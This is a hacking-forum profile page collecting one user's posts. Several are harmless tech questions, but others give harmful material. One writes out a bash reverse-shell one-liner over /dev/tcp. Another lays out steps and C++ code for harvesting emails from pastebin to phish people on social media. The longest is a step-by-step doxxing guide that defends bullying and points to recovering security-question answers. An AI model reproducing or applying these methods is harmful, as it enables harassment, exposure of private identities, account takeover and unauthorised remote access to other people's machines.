Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


About vailixi

  • Rank
    Hak5 Pirate

Recent Profile Visitors

2,121 profile views
  1. ALFA is a good all around wireless device. I have the AWUS036NEH and it has never failed me when doing actually wireless hacking. I was using TP-Link and PCIe cards. They work fine for running deauths.
  2. I need web hosting. I've tried ordering from the some of the major hosting companies lately. I've had two of payment gateways just repeatedly fail. Just looses my payment information or my account information. or it doesn't like my credit card or paypal doesn't work. I'm really sick of it. So I'm looking for a smaller business to host me. Where I can send you an email with my account details and you send me back a login and the nameserver I can point my domains to. Preferably you accept PayPal. And Go!
  3. So you have a lock system that runs on 176khz. What kind of device would be used to capture RFID card information. Basically you swipe the card in from of the reader and it lets you in the door. I don't know a lot about access control systems and I'm kinda curious. Is there much security on these things or are they a lot like a garage door opener? I curious about auditing them and I also curious about things you can do to make them more secure. Any thoughts?
  4. Is there a way to get verbose errors whilst debugging javascript? I had written an application in C++ and I'm porting it to javascript the only thing is javascript doesn't like some of the strings and just wants to throw an error. I looked up how to remove non-English characters a bunch of different ways. Not really sure what I'm doing wrong. It just says SyntaxError: missing ; before statement It links the line and thats all well and good but it's a string array with about 14,000 strings and where that missing ; is supposed to be I'm really not sure. Is there an IDE for javascript that will give me better error messages or some bash-fu I can run on the javascript files to remove the array elements that are not compatible? Also is there a maximum array size in javascript?
  5. i wrote this kinda random inappropriate but probably funny emo band name generator. There's not much code to it really. It might be a good example for a newb coder for creating random numbers and using them to access items from an array but other than that it serves no purpose. Just for fun. Looking up the names and such was most of the work. I hope it makes you laugh. git clone cd Emo_Band_Name_Generator g++ -o names.o -c names.cpp && g++ -o names names.o to run ./names
  6. I was just uploading files to drive and I was a little annoyed that my entire upload stopped to ask if I wanted to overwrite a duplicate file. The fact that firefox knows it's a duplicate file makes this a trivial point in programming. Since it knows the file is duplicate it should know what files are already on the server. If the file you are uploading is duplicate it should wait until the end to ask what you want to do with the file and upload the unique files first that way the entire download isn't stalled until you manually click the dialogue box asking if you want to overwrite the file or skip it. Just skip the file until the end of the upload. If you don't click the dialogue box within X seconds it just defaults to only uploading the unique files. I should code this option into a browser object and make it work just as an example. I'm just not really sure where to look for conditional http request. Anybody know of an arcane network programming book that covers topics like this? Better yet is there an implementation of this already somewhere that I can borrow code base from? Anyway what do you guys thing about this idea?
  7. I was reading though this post on the old backtrack forum: There's some useful BASH there that will output the stations #/bin/bash wlaninterface=eth1 outputprefix=output sleeptime=30s maxclients=20 rm $outputfileprefix*.csv &> /dev/null airodump-ng -w $outputprefix --output-format csv $wlaninterface &> /dev/null & sleep $sleeptime kill $! grep -aA $maxclients 'MAC' `ls $outputprefix*.csv` \ | grep "$1" \ | sed -e '/Station/d' -e 's/,//' \ | awk '{print $1}' > list_of_station cat list_of_station You can just use something like sed to replace the : with - and cut the second half of the mac off then loop the csv file clients and output the oui from /var/lib/ieee-data/oui.txt for each client I'd write the whole function but I gotta go to work. Hope this helps. It's a little simple than all of the code that was up there.
  8. I don't know if this had been covered. It's early in the morning and I'm always fully attentive until I've had coffee. There are 14 channels on wifi. Not sure which are used. Usually only 1-11 are used. But you can set your router differently. Not legal in all juristictions. airodump-ng has a --manufacturer option that will create it's own column in the csv file you can grep out the station MAC and manufacturer from the OUI list you'll need to run airodump-ng-oui-update
  9. @Mother I'm just going to say this one thing. When you talk about hacking you might replace the word "victim" with "target". Target seems the more appropriate and professional sounding.
  10. Actually yeah. You could probably create a list of emails with just the most common first names and last names and just create the emails like bob.holmes, bobholmes, or holmes.bob then append the domain at the end. Like the top 100 email providers like,,, etc. Then see if there is an email account associated with it. Or you could just create the email list and write a script to run searches on Google and Pipl for accounts. Then you could pretty much create an internet phone book of virtually everyone who uses those email services and has a common name. Like a d0xxing engine. That would be kinda cool. Really doesn't sound that hard to do either.
  11. Faceboo users also have to accept the invite. So it would be like any kind of grey hat internet marketing campaign with success rates measured in percentages. So it's like dynamite fishing. Rather dynamite phishing. I know facebook only lets you have a maximum of 5000 friends per account and there is a maximum number of contacts you can have in gmail. The account used to add all of the friends may or may not get reported.
  12. I thought this might be a good topic for discussion. I had wondered how hard it would be add a bunch of people I didn't know to facebook or LinkedIn. I had noticed when I signed up for some social media sites that there is an option to import contacts from your email contact list. While it's illegal to send spam emails I don't think it's illegal to use the email addresses to add friends on facebook. So basically if you wanted to find a bunch of people from a company or a school on LinkedIn or facebook you could pretty much use a method like this in social engineering or phishing on social media. Once again I'm not totally sure on the legality of doing this but I figure it is worth a discussion. Steps: Get the email list I figured a guy could pretty much hit up pastebin and create an email list for any organization he wanted to target. Grep out the email address and sort them for uniqueness. Also sort out domain names or domain extenssions you don't want like .gov or .mil addresses. You probably wouldn't want to accidentally spam or phish them. Split the lists into sections smaller than the maximum allowed limit. I think gmail it's 3000 or 5000. Forgot it. split them into 2500 line text files. Then convert the text file into CSV with a program kinda like this. I wrote this pretty hastily. Just opens up a file and writes a csv header with the correct fomat for gmail. Make sure to get the number of commas right. You can do this with Yahoo! and other free email services. There are some security measures against it. Then import the email list into your contacts as a CSV. Then add friends on social media sites from your contact list. That simple. Here's a link to the blog post I wrote about it. Here's some hasty C++ for the CSV maker. My code is shit just to let you know in advance. //application to sort email addresses and put them into a CSV for use with gmail. #include <string> #include <sstream> #include <iostream> #include <cctype> #include <fstream> #include <iomanip> using namespace std; int main (int argc, char* argv[]) { //build command line statement from string variables {ofstream myfile; ("/root/Desktop/emails.csv"); { string line; ifstream infile ("/root/file.txt"); //input the layout information for CSV file myfile << "Name,Given Name,Additional Name,Family Name,Yomi Name,Given Name Yomi,Additional Name Yomi,Family Name Yomi,Name Prefix,Name Suffix,Initials,Nickname,Short Name,Maiden Name,Birthday,Gender,Location,Billing Information,Directory Server,Mileage,Occupation,Hobby,Sensitivity,Priority,Subject,Notes,Group Membership,E-mail 1 - Type,E-mail 1 - Value,E-mail 2 - Type,E-mail 2 - Value" << endl; if (infile.is_open()) { while ( getline (infile,line) ) //output conacts to contact list. Comas delimit contact information fields. myfile << ",,,,,,,,,,,,,,,,,,,,,,,,,,,* ," << line << ",," << endl; infile.close(); myfile.close(); } else cout << "Unable to open file" << endl; } } return 0; }
  13. Not totally sure what I'm doing. I started a reverse shell on my ubuntu machine. 0<&96-;exec 96<>/dev/tcp/;sh <&96 >&96 2>&96 I get a file descriptor error when I run the command but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from armitage it seems to work fine. When I reboot the target it just black screens and never runs desktop. It's funny. I had been hacked running Ubuntu about a week ago but I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell and what do I do to fix the issue on the target machine?
  14. Before I get into this to much I'm going to say a few words on ethics. Bullying sometimes serves as a catalyst for positive social change. From an anthropological prospective bullying is a way more primitive people assert their place in the dominance hierarchy. Yes in this day and age it would be nice if people were beyond the need for this but really we aren't. People I think are a little to thin skinned and will report people for just about any arbitrary reason. Not cool if you have a business that depends partially on social media as a marketing platform. That all being said I learned d0xxing when I was an activist. I later applied that to skiptracing gigs and other legitimate investigations. Open Notepad. Copy and paste everything from their social media profile. Start looking up usernames on sites like Pipl If you get hits on the usernames look through those profiles and check the personal information to check for matches. For example if the person's age is about 30, profiles will pop up with age of 60 and those aren't good results. Make a logic chart and start narrowing down the results until you have a few suspects. You'll be amazed how many people use the same username or display name for multiple accounts. Sometimes they will have a twitter that will have the same username as the account in question and the twitter account will have their real name. You can look them up on sites like LinkedIn and pretty much know everything about them. You can get grids on their work place. If you get an email address that is a work email you do a whois search on the domain name. If it comes up with domain privacy don't just stop looking. Try to whois the nameservers sometimes people will pretty stealth with their domain privacy but then the hosting company is one of their buddies and you can just look them up. Sometimes the person will be friends with the webmaster on sites like facebook and you can learn more about them. So if you've gone the d0xxing route you have some person information on the person. A lot of times you can find information like hometown, mother's maiden name, etc. Sometimes those are used as security questions for password resets and things like that. Keep in mind that illegal hacking could land you in prison. Also if you want to present evidence to an employer or authorities it should be evidence that you came upon legally. Also bare in mind the impact releasing the person's information may have on them professionally or personally and way out whether or not it is a proportional response to what they were doing. In other words don't make your personal mission to wreck someone's because you are butthurt about something somebody said on tinychat, way out the impact. Also on the record I adore internet sh*@lords. They make me laugh. I don't take kindly when someone PDOSes my machine because I said something that doesn't go along with whatever narrative they are pushing.
  15. I installed Kali on my new laptop. There's an issue when it boots. Everything works fine except when it boots Kali doesn't find a display to use. I think it's an issue where by default the system uses both displays (The regular laptop screen and the HDMI output). In some cases you can fix issues like this in the BIOS by setting the default display device. My BIOS doesn't have that option. So what I think is going on is that since there isn't a display set Kali doesn't know which of the two to use and it just black screens. I think that's the issue. Not totally sure though. It sounds legit though. KEK. If I boot into recover mode I get a shell. Can I fix the issue from here? Is there a boot parameter I can feed it for the display? Is there a config I can edit. Can I edit the config file then live build the thing so it works without hassle? What's the best way to fix something like this?